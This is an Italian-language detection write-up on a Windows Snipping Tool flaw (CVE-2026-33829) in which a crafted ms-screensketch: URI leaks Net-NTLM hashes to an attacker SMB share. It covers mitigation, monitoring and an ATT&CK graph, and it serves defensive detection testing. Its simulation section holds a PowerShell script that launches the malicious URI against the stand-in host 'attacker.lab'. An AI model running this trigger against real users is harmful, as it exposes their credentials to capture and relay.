Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Una vulnerabilità nello Strumento di Cattura di Windows può esporre le hash Net-NTLM dell’utente attualmente connesso a un attaccante remoto. Il problema viene attivato tramite un deep link malevolo che sfrutta lo ms-screensketch schema URI, causando l’apertura da parte dello Strumento di Cattura di un file ospitato su una condivisione SMB controllata dall’attaccante. Sebbene la vittima debba fare clic o aprire il link creato ad hoc, la perdita delle credenziali avviene silenziosamente in background quando Windows avvia la connessione SMB. Questo comportamento può dare agli attaccanti accesso ai dati di sfida-risposta NTLM senza alcun avviso visibile all’utente.
Indagine
I ricercatori hanno scoperto che il ms-screensketch protocollo accetta un filePath come parametro e non limita correttamente percorsi UNC arbitrari. Quando lo Strumento di Cattura tenta di accedere a un tale percorso, Windows tenta automaticamente di autenticare al server SMB remoto, esponendo la risposta NTLM nel processo. Per convalidare il problema, i ricercatori hanno costruito script proof-of-concept che avviano un listener SMB e generano un URI malevolo in grado di catturare l’hash trapelato.
Mitigazione
Microsoft ha rilasciato un aggiornamento di sicurezza il 14 aprile 2026 per affrontare il problema rimuovendo il comportamento vulnerabile del deep link dallo Strumento di Cattura. Applicare questa patch impedisce all’applicazione di aprire automaticamente i percorsi SMB forniti da un aggressore tramite URI non attendibili. Le organizzazioni dovrebbero dare priorità alla distribuzione dell’aggiornamento sui sistemi Windows interessati per eliminare l’esposizione.
Risposta
I difensori dovrebbero monitorare i tentativi di invocare lo ms-screensketch schema URI e controllare le connessioni SMB in uscita verso host interni o esterni insoliti. I sistemi che non richiedono lo Strumento di Cattura dovrebbero avere il protocollo limitato dove possibile, e la distribuzione delle patch dovrebbe essere applicata senza ritardi. Qualsiasi hash NTLM esposto dovrebbe essere investigato tempestivamente per segni di replay, relay, o altri abusi successivi.
graph TB classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc action_user_click[“<b>Azione</b> – <b>T1204.001 Esecuzione utente: collegamento malevolo</b><br/>L’utente fa clic su un collegamento malevolo che attiva l’esecuzione.”] class action_user_click action tool_snipping[“<b>Strumento</b> – <b>Nome</b>: Snipping Tool (URI ms-screensketch)<br/><b>Tecnica</b>: T1204 Esecuzione utente<br/><b>Descrizione</b>: Avviato tramite il gestore URI ms-screensketch.”] class tool_snipping tool tech_smb_conn[“<b>Tecnica</b> – <b>T1550.002 Pass the Hash</b><br/>Snipping Tool elabora un filePath e avvia una connessione SMB verso un server controllato dall’attaccante, consentendo la cattura dell’hash.”] class tech_smb_conn technique tech_hash_capture[“<b>Tecnica</b> – <b>Accesso alle credenziali</b><br/>L’attaccante cattura l’hash Net-NTLM dallo scambio di autenticazione SMB.”] class tech_hash_capture technique tech_lateral[“<b>Tecnica</b> – <b>T1550.002 Pass the Hash</b><br/>L’hash catturato può essere riutilizzato per movimento laterale o escalation dei privilegi.”] class tech_lateral technique tech_c2_web[“<b>Tecnica</b> – <b>T1071.001 Protocollo di livello applicazione: protocolli web</b><br/>L’attaccante può utilizzare protocolli HTTP/S per comunicazione di comando e controllo.”] class tech_c2_web technique tech_persistence[“<b>Tecnica</b> – <b>T1574.006 Hijacking del flusso di esecuzione: hijacking del linker dinamico</b><br/>Possibile persistenza tramite hijacking del linker dinamico del processo Snipping Tool.”] class tech_persistence technique action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence
Flusso di Attacco
Esecuzione Simulazione
Prerequisito: Il Controllo Pre-volo della Telemetria e Baseline deve essere passato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrazione dell’Attacco e Comandi:
Un attaccante ha ottenuto un punto d’appoggio sulla workstation della vittima e desidera raccogliere hash NTLM senza suscitare sospetti. Sfruttando il CVE‑2026‑33829, l’attaccante crea un
URI ms‑screensketch:che punta a una condivisione SMB controllata dall’attaccante (attacker.labsharepayload.png). Quando lo Strumento di Cattura elabora questo URI, Windows avvia automaticamente una connessione SMB al server remoto, trapelando la risposta NTLM della macchina. L’attaccante esegue l’URI tramite PowerShell per garantire che lo Strumento di Cattura sia invocato nel contesto dell’utente. -
Script di Test Regressione:
# Fuga NTLM tramite Strumento di Cattura – script trigger # Regola il percorso UNC per puntare al tuo listener controllato. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "Invocazione dello Strumento di Cattura con URI malevolo..." Start-Process $uri # Attendi qualche secondo per completare la stretta di mano SMB Start-Sleep -Seconds 5 Write-Host "Invocazione completata. Controlla il SIEM per EventID 3 con DestinationHostname contenente '$attackerServer'." -
Comandi di Pulizia:
# Rimuovere eventuali processi residui dello Strumento di Cattura (se ancora in esecuzione) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # Opzionale: eliminare i file temporanei creati sul lato attaccante (se presenti) # (Presuppone di avere accesso in scrittura alla condivisione) # Remove-Item -Path "$attackerServer$sharePath" -Force